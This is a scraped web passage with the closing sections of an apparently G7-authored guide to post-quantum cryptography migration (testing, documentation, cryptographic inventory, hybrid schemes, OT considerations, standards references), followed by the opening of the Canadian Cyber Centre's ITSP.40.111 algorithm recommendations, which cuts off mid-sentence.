title="Post-quantum cryptography">PQC</abbr>. Determining potential issues early on will generally reduce costs, errors and the time to perform the transition, and may result in fewer issues during the upgrade process. When performing the transition, make sure to follow your organizationās change-management processes.</p> </div> <div> <h3 id="Testing">Testing</h3> <p>In addition to the testing that your organization already performs on your IT environments, you should consider adding <abbr title="Post-quantum cryptography">PQC</abbr> tests to your test plans. This will ensure that your IT environment continues to meet organizational requirements and also validate that the <abbr title="Post-quantum cryptography">PQC</abbr> has been implemented correctly. At minimum, your plans should:</p> <ul><li><strong>Ensure that the cryptographic products meet system requirements</strong><br /> Some devices use dedicated hardware or chip instruction extensions to improve the performance of traditional cryptography. Although initial testing shows some <abbr title="Post-quantum cryptography">PQC</abbr> processing is as fast as existing <abbr title="public key cryptography">PKC</abbr>, until dedicated hardware is available for <abbr title="Post-quantum cryptography">PQC</abbr>, it may perform more slowly than systems currently in use. Another consideration is that <abbr title="Post-quantum cryptography">PQC</abbr> key, ciphertexts and signatures are often larger than those produced with the existing <abbr title="public key cryptography">PKC</abbr> algorithms. Problems could arise from these larger sizes when using low bitrate or noisy network connections such as on radios. Due to these concerns, and possibly others, it is important to ensure that new or transitioned devices continue to meet the systemās prescribed requirements.</li> <li><strong>Validate interoperability</strong> Although a product may have been tested by a vendor, interoperability can fail between vendors based on different implementation assumptions. In situations where 2 or more products must work together to form a solution, it is important to perform testing to ensure that they will interoperate together.</li> <li><strong>Test configurations to enable <abbr title="Post-quantum cryptography">PQC</abbr></strong> Configuring a system to support <abbr title="Post-quantum cryptography">PQC</abbr> will often involve more than pressing a button or checking a box on a graphical interface. It may involve obtaining new cryptographic certificates as well as turning off cryptographic ciphers that you no longer wish to use. Having a plan to test varying configurations and verify that <abbr title="Post-quantum cryptography">PQC</abbr> algorithms are being used correctly will alleviate any mistakes that could leave your data and systems unprotected.</li> </ul></div> <div> <h3 id="Documentation">Documentation</h3> <p>During the transition, it is important to ensure that each change to any system is well documented. Relevant documentation includes but is not limited to:</p> <ul><li><strong>Business continuity plans (BCPs)</strong> As your environment changes, it is important to ensure that your BCP is kept up to date to ensure that it captures all the information necessary to continue business operations in the case of a disruption.</li> <li><strong>Configuration and use documentation</strong> The configuration, as well as any specific use instructions for each system, should be recorded. This includes any configurations made to support <abbr title="Post-quantum cryptography">PQC</abbr> and deprecate traditional cryptographic algorithms.</li> <li><strong>Information technology asset management (ITAM)</strong> Update the organization ITAM to record any changes to hardware and software, including removing any items that will no longer be needed after the transition.</li> <li><strong>Cryptographic information</strong> Cryptographic recommendations will continue to change as new technologies are developed. Ensuring that all cryptographic technologies used in your organization are properly recorded and secured is an important part of cryptographic agility and will aid in future cryptographic changes. More information on storing cryptographic information can be found in Cryptographic inventory and the Cryptographic Bill of Materials in the Appendix of this publication.</li> </ul></div> </section><section><h2 id="Conclusion">Conclusion</h2> <p>Although the transition to <abbr title="Post-quantum cryptography">PQC</abbr> will bring many challenges, including time, cost and complexity, the G7 CWG believes that it is an important part of protecting your organizationās information technology and data. The G7 CWG has published this guidance on important topics that we believe will help you prepare your organization during the transition. In addition to this publication, the G7 CWG recommends that you review other relevant guidance including that from standards bodies as well as your national cyber agency. Please note that the guidance presented in this publication is for informational purposes only and should be tailored to fit the needs of your organization.</p> </section><section><h2 id="Appendix">Appendix</h2> <p>This appendix provides additional information on select topics that may be on interest to the reader.</p> <h3 id="consider-crypto-id">Considerations for identifying cryptography</h3> <h4>Tools and methods for cryptographic discovery</h4> <p>You can use different categories of tools and techniques to identify cryptographic assets in different scenarios. In most cases, relying only on automated tools wonāt be enough to exhaustively find cryptography in your environment, as the tools may miss something or provide false positives. It is necessary to combine automated and manual approaches (for example, tool output review, documentation analysis, vendor communications, internal discussions, etc.).</p> <p>The following sections outline different tools and techniques that you can use and their purposes.</p> <div> <p><strong>Network devices and applications</strong></p> <ul><li>Active network vulnerability scanners: to interrogate network services directly and list supported protocols, cipher suites, and key-exchange mechanisms, highlighting the use of weak or deprecated algorithms. For example, nmap, testssl.sh and openssl</li> <li>Passive monitoring and traffic analyzers: to capture and analyze live communications in order to observe which cryptographic protocols and algorithms are actually negotiated during sessions. For example, Wireshark and tcpdump</li> <li>Large-scale network scanning frameworks like Shodan or Censys.io can be employed to map cryptographic exposure of Internet-facing assets</li> </ul></div> <div> <p><strong>Externally developed software and hardware</strong></p> <ul><li>Binary and library inspection utilities: to analyze executables and verify dynamically linked cryptographic components and symbols</li> <li>Firmware inspection and analysis methods: to examine firmware images of embedded devices or accelerators for implemented algorithms and potential hardcoded keys</li> <li>System and hardware inventory utilities: to detect the presence of cryptographic accelerators, secure co-processors or dedicated modules integrated into servers and network appliances</li> </ul></div> <div> <p><strong>Internally developed and open-source software</strong></p> <ul><li>Source code analysis methods: to identify direct calls to cryptographic APIs, functions or hardcoded keys inside applications.</li> <li>Dependency and package inspection tools: to detect cryptographic libraries declared in project files or packages</li> <li>Static and dynamic analysis techniques: to examine compiled code for linked cryptographic components and functions</li> </ul></div> <p>It is important to note that most tools available (at the time of writing) were not originally designed to detect weaknesses specifically from a quantum-safe perspective. Their primary function is to identify outdated software versions, insecure configurations and vulnerable cryptographic implementations. However, they can still be effectively repurposed in the context of post-quantum migration, since they provide valuable insights on where traditional algorithms are deployed. By leveraging these existing tools, organizations can build an initial cryptographic inventory and highlight systems that are most exposed to quantum-related risks, even before dedicated <abbr title="Post-quantum cryptography">PQC</abbr>-focused discovery solutions become widely available.</p> <h4 id="crypto-inventory-bill">Cryptographic inventory and the Cryptographic Bill of Materials</h4> <p>There are different approaches for building and managing a cryptographic inventory, but adopting a structured, machine-readable representation of cryptographic assets, such as the <abbr title="Cryptographic Bill of Materials">CBOM</abbr>, is highly recommended.</p> <p><abbr title="Cryptographic Bill of Materials">CBOM</abbr> is a specialized extension of an <abbr title="Software Bill of Materials">SBOM</abbr><sup id="fn4-rf"><a class="fn-lnk" href="#fn4"><span class="wb-inv">Footnote </span>4</a></sup> that focuses exclusively on cryptographic assets. Essentially, it is a detailed list in a machine-readable format that describes cryptography in use along with metadata. It can track dependencies between algorithms and provide a way to associate both traditional and quantum security vulnerability scores with identified assets.</p> <p>Beyond its role as an inventory, the <abbr title="Cryptographic Bill of Materials">CBOM</abbr> helps increase the visibility of cryptographic assets across the organization and supports risks assessment. It allows organizations to evaluate quantum vulnerability, prioritize remediation and identify long-lived assets at risk of HNDL attacks.</p> <p>Furthermore, because the <abbr title="Cryptographic Bill of Materials">CBOM</abbr> can be easily updated throughout systems and applications lifecycles, it helps organizations maintain long-term consistency and control over their cryptographic assets</p> <!– Another footnote –> <h3 id="hybrid-crypto">Hybrid cryptography</h3> <p>In the context of the transition to <abbr title="Post-quantum cryptography">PQC</abbr>, hybrid or composite schemes may combine multiple cryptographic algorithms via suitable methods to achieve the desired security for the complete scheme, even if one of the components has been weakened or even broken. For signature schemes, this can be a method such as having 2 or more parallel implemented signature schemes and the complete signature is valid only when all signature components are valid. For key agreement schemes, multiple KEMs are combined to produce a single shared secret, in a so-called KEM-combiner. This tends to involve additional steps beyond computing the individual KEM components and leads to more complicated security analysis for the complete scheme.</p> <p>The typical use case currently involves combining a traditional, well-tested (albeit not quantum-secure) public key algorithm with a new <abbr title="Post-quantum cryptography">PQC</abbr> algorithm to form a post-quantum/traditional hybrid. If the <abbr title="Post-quantum cryptography">PQC</abbr> algorithm is appropriately implemented, such schemes provide potential protection against HNDL attacks, while maintaining the current level of security.</p> <p>Certain hybrid approaches could support long-term security while maintaining backwards compatibility or policy compliance and enabling the introduction of new algorithms across systems. You must carefully assess hybrid approaches to select the appropriate scheme for the desired need.</p> <h2 id="Operational-Tech">Operational and cloud technology considerations</h2> <p>Operational technology (OT) networks contain hardware and software that are used to control or monitor the physical world. They are often deployed in industrial or commercial settings to manage and monitor equipment, when doing it manually may not be practical ā for example, managing high-voltage output of electrical generators. Although it is recommended that organizations transition their infrastructure to <abbr title="Post-quantum cryptography">PQC</abbr>, it may not be possible or feasible to transition machinery that is managed and controlled by OT due to cost or availability. For this reason, other options should be considered.</p> <p><strong>Segmentation:</strong> It may be possible to segment technologies that cannot be transitioned to <abbr title="Post-quantum cryptography">PQC</abbr> away from the OT network. This may mean air-gapping an individual device or placing it on an air-gapped network with other systems that cannot be transitioned. Air-gapping technologies reduce, but cannot completely eliminate, the risk of attacks by threat actors. Depending on the OT network design, OT devices may need to communicate outside of the air-gapped network, so segmentation may not be possible. OT networks that are already air-gapped will already provide this security.</p> <p><strong>Tunnelling:</strong> OT infrastructure that cannot be segmented can use tunnelling to protect data in transit. The OT system in question uses a device to perform <abbr title="Post-quantum cryptography">PQC</abbr> encryption on its behalf. Examples of this approach include placing a VPN in front of the device or having a reverse proxy server that supports <abbr title="Post-quantum cryptography">PQC</abbr>. This approach allows infrastructure to be reachable by the OT network, while protecting the network with <abbr title="Post-quantum cryptography">PQC</abbr>.</p> <p>Many major cloud providers have already started to publish their plans to transition to <abbr title="Post-quantum cryptography">PQC</abbr>. If organizations are using a cloud provider for their software or infrastructure, they should communicate with their providers to understand their plans and timelines. When using hybrid cloud environments (a combination of both private and public cloud infrastructure), it will be important to ensure that both clouds continue to work together during the transition. When engaging with new cloud providers, we recommend requiring as part of the procurement contract that the provider support <abbr title="Post-quantum cryptography">PQC</abbr>.</p> <h3>Cryptographic assets in operational technology</h3> <p>In OT environments, such as industrial control systems (ICS), cryptographic discovery poses additional challenges compared to traditional IT systems due to limited computational resources, legacy systems and vendor-specific implementations. Moreover, unlike traditional IT, many industrial processes support critical functions that cannot be interrupted, which further complicates analysis activities.</p> <p>In addition to involving the vendor, suitable approaches could include:</p> <ul><li>Passive network monitoring, to identify which cryptographic protocols and cipher suites are negotiated in ICS/SCADA traffic without impacting the continuity or the integrity of industrial operations,</li> <li>Firmware and configuration inspection, to verify embedded cryptographic mechanisms in programmable logic controllers (PLCs) and industrial systems,</li> </ul><h3 id="Cert">Certification</h3> <p>Certification is a recognition by an independent assessment body that a product meets certain criteria. This can include implementation, evaluation and security assessments, thereby ensuring a high level of security for users and developers in the cyber security landscape. A certification is accompanied by a level of assurance, which corresponds to the more or less thorough depth of the analysis carried out by the evaluator, in accordance with the sponsor’s security objectives. Countries or industry sectors may have distinct certification schemes, but some schemes may be mutually recognized or internationally accepted.</p> <p>For the client and beneficiaries, certification represents a guarantee, often provided by a third-party organization, of the quality, safety or security of a product that they can verify before purchasing it.</p> <p>The transition to <abbr title="Post-quantum cryptography">PQC</abbr> will be long and costly. <abbr title="Post-quantum cryptography">PQC</abbr> requirements will need to be included in tenders to ensure the security of products in the coming years.</p> <p>Countries and industry sectors that have policies or regulations requiring certification benefit when there are multiple certified products with <abbr title="Post-quantum cryptography">PQC</abbr> available on the market.</p> <p>Certification schemes should be adapted to include requirements for <abbr title="Post-quantum cryptography">PQC</abbr> as soon as possible. This will involve working with national authorities, centres of expertise and laboratories, as well as solution providers to update regulations, certification processes and products.</p> <h3 id="info-sec">Information security management standards</h3> <p>For organizations that use standards as part of managing of their information security, the following table associates sections within this document with relevant standards. You may wish to review the references when performing the transition to <abbr title="Post-quantum cryptography">PQC</abbr>. This is not an exhaustive list and the G7 CWG recognizes that your organization may use other standards in place of or in addition to the ones listed below.</p> <h4>Relevant Standards</h4> <!– <div class="panel panel-default"> <header class="panel-heading">Publication section</header> <div class="panel-body"> <ul class="list-unstyled"> <li><strong><a href="#Documentation">Documentation</a></strong> <ul> <li>Reference: <a href="https://www.iso.org/standard/27001">International Organization for Standardization/International Electrotechnical Commission (ISO/IEC) Standard 27001:2022 Information security, cybersecurity and privacy protection ā Information security management systems ā Requirements</a> Annex A, Section 8.32 Change Management</li> </ul> </li> <li><strong><a href="#Id-crypto">Identifying cryptography</a></strong> <ul> <li>Reference: <a href="https://www.iso.org/standard/75652.html">ISO/IEC 27002:2022 Information security, cybersecurity and privacy protection ā Information security controls</a> Control 5.9 Inventory of Information & Other Associated Assets</li> <li>Reference: <a href="https://nvlpubs.nist.gov/nistpubs/CSWP/<abbr title="National Institute for Standards and Technology">NIST</abbr>.CSWP.29.pdf"><abbr title="National Institute for Standards and Technology">NIST</abbr> Cybersecurity Framework (PDF)</a> 2.0 Appendix A. CSF Core<br> Function IDENTIFY,<br> Category ASSET MANAGEMENT: ID.AM-01, ID.AM-02, ID.AM-03, ID.AM-04</li> </ul> </li> <li><strong><a href="#Testing">Testing</a></strong> <ul> <li>Reference: <a href="https://www.iso.org/standard/75652.html">ISO/IEC 27001:2022</a>,<br> Annex A, Section 8.29 Security Testing in Development and Acceptance<br> Annex A, Section 8.31 Separation of Development, Test and Production Environments</li> </ul> </li> </ul> </div> </div> </section> –> <table class="table table-bordered"><thead><tr><th scope="col">Publication section</th> <th scope="col">Reference</th> </tr></thead><tbody><tr><td><a href="#Documentation">Documentation</a></td> <td><a href="https://www.iso.org/fr/standard/27001">International Organization for Standardization/International Electrotechnical Commission (ISO/IEC) Standard 27001:2022 Information security, cybersecurity and privacy protectionĀ ā Information security management systemsĀ ā Requirements</a> Annex A, Section 8.32 Change Management</td> </tr><tr><td><a href="#Id-crypto">Identifying cryptography</a></td> <td><a href="https://www.iso.org/fr/standard/75652.html">ISO/IEC 27002:2022 Information security, cybersecurity and privacy protectionĀ ā Information security controls</a> Control 5.9, Inventory of Information & Other Associated Assets</td> </tr><tr><td><a href="#Id-crypto">Identifying cryptography</a></td> <td><a href="https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.29.pdf"><abbr title="National Institute for Standards and Technology">NIST</abbr> Cybersecurity Framework 2.0 (PDF)</a> Appendix A. CSF Core Function IDENTIFY,<br /> Category ASSET MANAGEMENT:<br /> ID.AM-01, ID.AM-02, ID.AM-03, ID.AM-04</td> </tr><tr><td><a href="#Testing">Testing</a></td> <td><a href="https://www.iso.org/fr/standard/75652.html">ISO/IEC 27001:2022 (en anglais seulement)</a>, Annex A, Section 8.29 Security Testing in Development and Acceptance<br /><a href="https://www.iso.org/fr/standard/75652.html">ISO/IEC 27001:2022 (en anglais seulement)</a>, Annex A, Section 8.31 Separation of Development, Test and Production Environments</td> </tr></tbody></table><aside class="wb-fnote" role="note"><h2 id="5">Footnotes</h2> <dl><dt>Footnote 1</dt> <dd id="fn1"> <p>European Commission. <a href="https://digital-strategy.ec.europa.eu/en/library/coordinated-implementation-roadmap-transition-post-quantum-cryptography">A Coordinated Implementation Roadmap for the Transition to Post-Quantum Cryptography</a>, June 2025.</p> <p class="fn-rtn"><a href="#fn1-rf"><span class="wb-inv">Return to footnote</span>1<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 2</dt> <dd id="fn2"> <p>JSON Web Tokens (JWTs) in case of OAuth 2.0 and OIDC.</p> <p class="fn-rtn"><a href="#fn2-rf"><span class="wb-inv">Return to footnote</span>2<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 3</dt> <dd id="fn3"> <p>Operational technology (OT) and industrial control systems (ICS) or supervisory control and data acquisition (SCADA) environments often rely on custom embedded devices.</p> <p class="fn-rtn"><a href="#fn3-rf"><span class="wb-inv">Return to footnote</span>3<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 4</dt> <dd id="fn4"> <p>Both CycloneDX and SPDX <abbr title="Software Bill of Materials">SBOM</abbr> standard formats have specific extensions for <abbr title="Cryptographic Bill of Materials">CBOM</abbr>.</p> <p class="fn-rtn"><a href="#fn4-rf"><span class="wb-inv">Return to footnote</span>4<span class="wb-inv"> referrer</span></a></p> </dd> </dl></aside></section></div> </div> </div> </div> </div> </article>
- Cryptographic algorithms for UNCLASSIFIED, PROTECTED A, and PROTECTED B information – ITSP.40.111by Canadian Centre for Cyber Security on May 29, 2026 at 6:46 pm
<article data-history-node-id="6161" about="/en/guidance/cryptographic-algorithms-unclassified-protected-protected-b-information-itsp40111" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout–onecol"> <div class="layout__region layout__region–content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field–name-body field–type-text-with-summary field–label-hidden field–item"><div class="row"> <div class="col-md-4 pull-left hidden-xs hidden-sm"> <p class="text-left"><strong>May 2026</strong></p> </div> <div class="col-md-4 hidden-xs hidden-sm"> <p class="text-center"><strong>Practitioner series</strong></p> </div> <div class="col-md-4 pull-right hidden-xs hidden-sm"> <p class="text-right"><strong>ITSP.40.111</strong></p> </div> <!–MOBILE STARTS HERE–> <div class="hidden-lg hidden-md text-center"> <p><strong>May 2026Ā |Ā Practitioner series</strong></p> </div> <!–pdf download–> <div class="col-md-12 mrgn-tp-md"> <div class="mrgn-bttm-md well well-sm col-md-4 col-sm-12 col-xs-12 pull-right mrgn-lft-md"> <p class="mrgn-tp-sm"><strong>Alternate format</strong>: <a href="/sites/default/files/itsp40111-cryptographic-algorithms-e.pdf">Cryptographic algorithms for unclassified, protected A, and protected B information (Version 5)Ā – ITSP.40.111 (PDF,Ā 868Ā KB)</a></p> </div> <h2 class="text-info" id="n1">Foreword</h2> <p>Cryptographic algorithms for UNCLASSIFIED, PROTECTED A, and PROTECTED B information is an UNCLASSIFIED publication issued by the Head, Canadian Centre for Cyber Security (Cyber Centre) and provides an update to and supersedes the previously published version. For more information, email, or phone our Contact Centre at: <a href="mailto:contact@cyber.gc.ca">contact@cyber.gc.ca</a>, <a href="tel:+16139497048">(613) 949-7048</a> or <a href="tel:+18332923788">1-833-CYBER-88</a>.</p> <h2 class="text-info">Effective date</h2> <p>This publication takes effect on May 29, 2026.</p> <h2 class="text-info">Revision history</h2> <ol><li><strong>First release:</strong> August 2, 2016</li> <li><strong>Updated version (version 2):</strong> August 17, 2022</li> <li><strong>Updated version (version 3):</strong> March 19, 2024</li> <li><strong>Updated version (version 4):</strong> March 5, 2025</li> <li><strong>Updated version (version 5):</strong> May 29, 2026</li> </ol><section><h2 class="text-info">Overview</h2> <p>This publication identifies and describes recommended cryptographic algorithms and appropriate methods of use that organizations can implement to protect sensitive information. For Government of Canada (GC) departments and agencies, the guidance in this publication applies to UNCLASSIFIED, PROTECTED A and PROTECTED B information.</p> <p>Your organization’s ability to protect sensitive data and information is fundamental to the delivery of programs and services. Properly configured cryptography provides security mechanisms which can be used to protect the authenticity, confidentiality and integrity of information. Several algorithms may be required to satisfy your organization’s security requirements, and each algorithm should be selected and implemented to meet those requirements.</p> </section><section><details class="mrgn-tp-md"><summary><h2 class="h3">Table of contents</h2> </summary><ul class="list-unstyled"><li><a href="#a1">1 Introduction</a> <ul class="lst-none"><li><a href="#a11">1.1 Practitioner notes</a></li> <li><a href="#a12">1.2 Policy drivers</a></li> <li><a href="#a13">1.3 Relationship to the <abbr title="information technology">IT</abbr> risk management process</a></li> </ul></li> <li><a href="#a2">2 Post quantum cryptography</a></li> <li><a href="#a3">3 Encryption algorithms</a> <ul class="lst-none"><li><a href="#a31">3.1 Advanced encryption standard algorithm</a></li> </ul></li> <li><a href="#a4">4 Encryption algorithm modes of operation</a> <ul class="lst-none"><li><a href="#a41">4.1 Protecting the confidentiality of information</a></li> <li><a href="#a42">4.2 Protecting the confidentiality and authenticity of information</a></li> </ul></li> <li><a href="#a5">5 Key establishment schemes</a> <ul class="lst-none"><li><a href="#a51">5.1 Rivest-Shamir-Adleman</a></li> <li><a href="#a52">5.2 Finite Field Cryptography Diffie-Hellman and Menezes-Qu-Vanstone</a></li> <li><a href="#a53">5.3 Elliptic Curve Cryptography Cofactor Diffie-Hellman and Menezes-Qu-Vanstone</a></li> <li><a href="#a54">5.4 Module-Lattice-Based Key-Encapsulation Mechanism</a></li> </ul></li> <li><a href="#a6">6 Digital signature schemes</a> <ul class="lst-none"><li><a href="#a61">6.1 Rivest-Shamir-Adelman</a></li> <li><a href="#a62">6.2 Digital Signature Algorithm</a></li> <li><a href="#a63">6.3 Elliptic Curve Digital Signature Algorithm</a></li> <li><a href="#a64">6.4 Edwards-Curve Digital Signature Algorithm</a></li> <li><a href="#a65">6.5 Module-Lattice-Based Digital Signature Algorithm</a></li> <li><a href="#a66">6.6 Stateless Hash-Based Signature Algorithm</a></li> <li><a href="#a67">6.7 Stateful hash-based signature schemes</a></li> </ul></li> <li><a href="#a7">7 Hash functions</a> <ul class="lst-none"><li><a href="#a71">7.1 Secure Hash Algorithm-1</a></li> <li><a href="#a72">7.2 Secure Hash Algorithm-2</a></li> <li><a href="#a73">7.3 Secure Hash Algorithm-3</a></li> </ul></li> <li><a href="#a8">8 Extendable output functions</a> <ul class="lst-none"><li><a href="#a81">8.1 SHAKE</a></li> </ul></li> <li><a href="#a9">9 Message Authentication Codes</a> <ul class="lst-none"><li><a href="#a91">9.1 Keyed-Hash Message Authentication Code</a></li> <li><a href="#a92">9.2 Cipher-based Message Authentication Code</a></li> <li><a href="#a93">9.3 Galois/Counter Mode Message Authentication Code</a></li> <li><a href="#a94">9.4 KECCAK Message Authentication Code</a></li> </ul></li> <li><a href="#a10">10 Key Derivation Functions</a> <ul class="lst-none"><li><a href="#a101">10.1 One-Step Key Derivation Function</a></li> <li><a href="#a102">10.2 Two-Step Key Derivation Function</a></li> <li><a href="#a103">10.3 Key Derivation using pseudorandom functions</a></li> <li><a href="#a104">10.4 Internet Key Exchange version 2 Key Derivation Function</a></li> <li><a href="#a105">10.5 Transport Layer Security version 1.2 Key Derivation Function</a></li> <li><a href="#a106">10.6 Secure Shell Key Derivation Function</a></li> <li><a href="#a107">10.7 Secure Real-time Transport Protocol Key Derivation Function</a></li> <li><a href="#a108">10.8 Trusted Platform Module Key Derivation Function</a></li> <li><a href="#a109">10.9 Password-based Key Derivation Function</a></li> </ul></li> <li><a href="#b11">11 Key wrap modes of operation</a> <ul class="lst-none"><li><a href="#b111">11.1 Advanced Encryption Standard Key Wrap</a></li> <li><a href="#b112">11.2 Advanced Encryption Standard Key Wrap with Padding</a></li> </ul></li> <li><a href="#b12">12 Random bit generators</a></li> <li><a href="#b13">13 Commercial technologies assurance programs</a></li> <li><a href="#b14">14 Summary</a></li> <li><a href="#fig1">Figure 1: <abbr title="information technology">Cyber security risk management process</abbr></a></li> <li><a href="#b15">Annex 1: Revisions</a></li> </ul></details></section><section><h2 class="text-info" id="a1">1 Introduction</h2> <p>Organizations rely on information technology (IT) systems to achieve business objectives. These interconnected systems can be the targets of serious threats and cyber attacks that threaten the availability, authenticity, confidentiality and integrity of the information assets. Compromised networks, systems or information can negatively affect business activities and may result in data breaches and financial loss.</p> <p>This publication helps IT practitioners choose and appropriately use cryptographic algorithms. When used with valid domain parameters and specific key lengths, the cryptographic algorithms listed in this publication are recommended cryptographic mechanisms for protecting the authenticity, confidentiality and integrity of sensitive UNCLASSIFIED, PROTECTED A and PROTECTED B information to the medium injury level, as defined in the Cyber Centre’s <a data-entity-substitution="canonical" data-entity-type="node" data-entity-uuid="40878ccb-9e7b-4370-9e97-631a42ac4a2d" href="/en/guidance/cyber-security-privacy-risk-management">Cyber security and privacy risk management: A lifecycle approach (ITSP.10.033)</a>. For requirements on the use of Cyber Centre-approved cryptography to protect PROTECTED C and classified information, email the Cyber Centre at <a href="mailto:contact@cyber.gc.ca">contact@cyber.gc.ca</a>.</p> <p>This publication complements the Treasury Board of Canada Secretariat (TBS) <a href="https://www.tbs-sct.canada.ca/pol/doc-eng.aspx?id=26262">Guideline on Defining Authentication Requirements</a>. Organizations are responsible for determining their security objectives and requirements as part of their risk management framework.</p> <h3 id="a11">1.1 Practitioner notes</h3> <p>In this publication, the Cyber Centre makes recommendations for cryptographic algorithms and parameters. We also list algorithms that should be phased out. New applications should not use these algorithms. Where these algorithms are used in existing applications, they should be replaced with the recommended algorithms in this publication. For certain algorithms, we specify a date by which organizations should replace these algorithms. In other instances, organizations should replace these algorithms as soon as possible.</p> <p>When an algorithm requires a primitive, organizations should choose 1 of the algorithms recommended in this publication, unless otherwise specified. For example, a hash function from section <a href="#a72">7.2 Secure Hash Algorithm-2</a> should be used when using the Keyed-Hash Message Authentication Code (HMAC) from section <a href="#a91">9.1 Keyed-Hash Message Authentication Code</a>. When an algorithm requires a parameter, organizations should select 1 of the recommended parameters in the given reference for the algorithm, unless otherwise specified.</p> <h3 id="a12">1.2 Policy drivers</h3> <p>Addressing and countering cyber threats and network vulnerabilities are crucial steps in securing networks, data and assets. GC departments must implement <abbr title="information technology">IT</abbr> security policies and procedures in accordance with the <abbr title="Treasury Board of Canada Secretariat">TBS</abbr> <a href="https://www.tbs-sct.canada.ca/pol/doc-eng.aspx?id=16578">Policy on Government Security</a>.</p> <h3 id="a13">1.3 Relationship to the <abbr title="information technology">IT</abbr> risk management process</h3> <p>The Cyber Centre’s <a data-entity-substitution="canonical" data-entity-type="node" data-entity-uuid="40878ccb-9e7b-4370-9e97-631a42ac4a2d" href="/en/guidance/cyber-security-privacy-risk-management">Cyber security and privacy risk management: A lifecycle approach (ITSP.10.033)</a> recommend that organizations undertake activities at 2 levels: the departmental level and the information system level.</p> <div class="panel panel-default col-md-12"> <div class="panel-body"> <figure><figcaption class="text-center" id="fig1"><strong>Figure 1: Cyber security risk management process</strong></figcaption><img alt="Figure 1 – Long description immediately follows" class="img-responsive center-block" src="/sites/default/files/images/itsp.40.111-fig1-e.png" /></figure><details><summary>Long description – Figure 1: Cyber security risk management process</summary><p>This figure describes the high-level departmental <abbr title="information technology">IT</abbr> security risk management process and associated activities, as well as the information system security risk management activities. It also highlights how the <abbr title="information technology">IT</abbr> security risk management activities at both levels act together in a continuous cycle to efficiently maintain and improve the security posture of departmental information systems.</p> <p>At the departmental level, the <abbr title="information technology">IT</abbr> security risk management activities conducted by the departmental security authorities (for example, CSO, ITSC) include:</p> <ul><li>define departmental <abbr title="information technology">IT</abbr> security needs and security controls</li> <li>deploy security controls</li> <li>monitor and assess performance of security controlsĀ – maintain authorization</li> <li>identify security control updates</li> </ul><p>The key deliverables of the deploy security controls activity are departmental control profiles and departmental <abbr title="information technology">IT</abbr> threat assessment reports. These deliverables are key inputs into the security risk management activities at the information system level.</p> <p>At the information system level, the <abbr title="information technology">IT</abbr> security risk management activities conducted by <abbr title="information technology">IT</abbr> project managers, security practitioners and developers include:</p> <ul><li>define <abbr title="information technology">IT</abbr> security needs and security controls</li> <li>design and develop or acquire information system with security</li> <li>integrate, test, and install information system with security</li> <li>operate, monitor, and maintain information systems with security</li> <li>securely dispose of <abbr title="information technology">IT</abbr> assets at retirement</li> </ul><p>Information from the operations and maintenance activities provide feed back into the monitor and assess activity at the departmental level. The <abbr title="information technology">IT</abbr> security performance feedback supports the maintain authorization activity under the monitor and assess.</p> </details></div> </div> <p>Departmental-level activities are integrated into the organization’s security program to plan, manage, assess and improve the management of <abbr title="information technology">IT</abbr> security-related risks faced by the organization. Cryptographic algorithms should be considered during the define, deploy, and monitor and assess stages of the risk management process. These activities are described in detail in <a href="/en/guidance/annex-1-departmental-it-security-risk-management-activities-itsg-33">Annex 1Ā – Departmental IT security risk management activities (ITSG-33)</a>.</p> <p>Information system-level activities are integrated into an information system lifecycle to ensure:</p> <ul><li><abbr title="information technology">IT</abbr> security needs of supported business activities are met</li> <li>appropriate security controls are implemented and operating as intended</li> <li>continued performance of the implemented security controls is assessed, reported back and acted upon to address any issues</li> </ul><p>Cryptographic algorithms should be considered during all information system-level activities. These activities are described in detail in <a href="https://www.cyber.gc.ca/en/guidance/annex-2-information-system-security-risk-management-activities-itsg-33">Annex 2Ā – Information system security risk management activities (ITSG-33)</a>.</p> </section><div class="clearfix">Ā </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <section><h2 class="text-info" id="a2">2 Post quantum cryptography</h2> <p>In August 2024, the U.S. National Institute of Standards and Technology (NIST) published standards for 3 post-quantum algorithms which are secure against known attacks from a quantum computer:</p> <ul><li>Module-Lattice-Based Key-Encapsulation Mechanism (ML-KEM) (see section <a href="#a54">5.4 Module-Lattice-Based Key-Encapsulation Mechanism</a>)</li> <li>Module-Lattice-Based Digital Signature Algorithm (ML-DSA) (see section <a href="#a65">6.5 Module-Lattice-Based Digital Signature Algorithm</a>)</li> <li>Stateless Hash-Based Digital Signature Algorithm (SLH-DSA) (see section <a href="#a66">6.6 Stateless Hash-Based Digital Signature Algorithm</a>)</li> </ul><p><abbr title="Module-Lattice-Based Key-Encapsulation Mechanism">ML-KEM</abbr> establishes shared key material between 2 parties over a public channel. It will replace the key establishment schemes in sections <a href="#a51">5.1 Rivest Shamir-Adleman</a>, <a href="#a52">5.2 Finite Field Cryptography Diffie-Hellman and Menezes-Qu-Vanstone</a>, and <a href="#a53">5.3 Elliptic Curve Cryptography Cofactor Diffie-Hellman and Menezes-Qu-Vanstone</a> for most use cases.</p> <p><abbr title="Module-Lattice-Based Digital Signature Algorithm">ML-DSA</abbr> and <abbr title="Stateless Hash-Based Digital Signature Algorithm">SLH-DSA</abbr> are digital signature schemes. <abbr title="Module-Lattice-Based Digital Signature Algorithm">ML-DSA</abbr> is a general-purpose, lattice-based, signature scheme and will replace the signature schemes in sections <a href="#a61">6.1 Rivest-Shamir-Adelman</a> to <a href="#a64">6.4 Edwards-Curve Digital Signature Algorithm</a> for most use cases. Hash-bashed signatures, including post-quantum stateful hash-based signature schemes and <abbr title="Stateless Hash-Based Digital Signature Algorithm">SLH-DSA</abbr>, rely on a different mathematical problem than <abbr title="Module-Lattice-Based Digital Signature Algorithm">ML-DSA</abbr>. Stateful hash-based signature schemes have the additional complexity that signature generation implementations must carefully manage an internal state. Mismanagement can result in a complete loss of security. <abbr title="Stateless Hash-Based Digital Signature Algorithm">SLH-DSA</abbr> does not 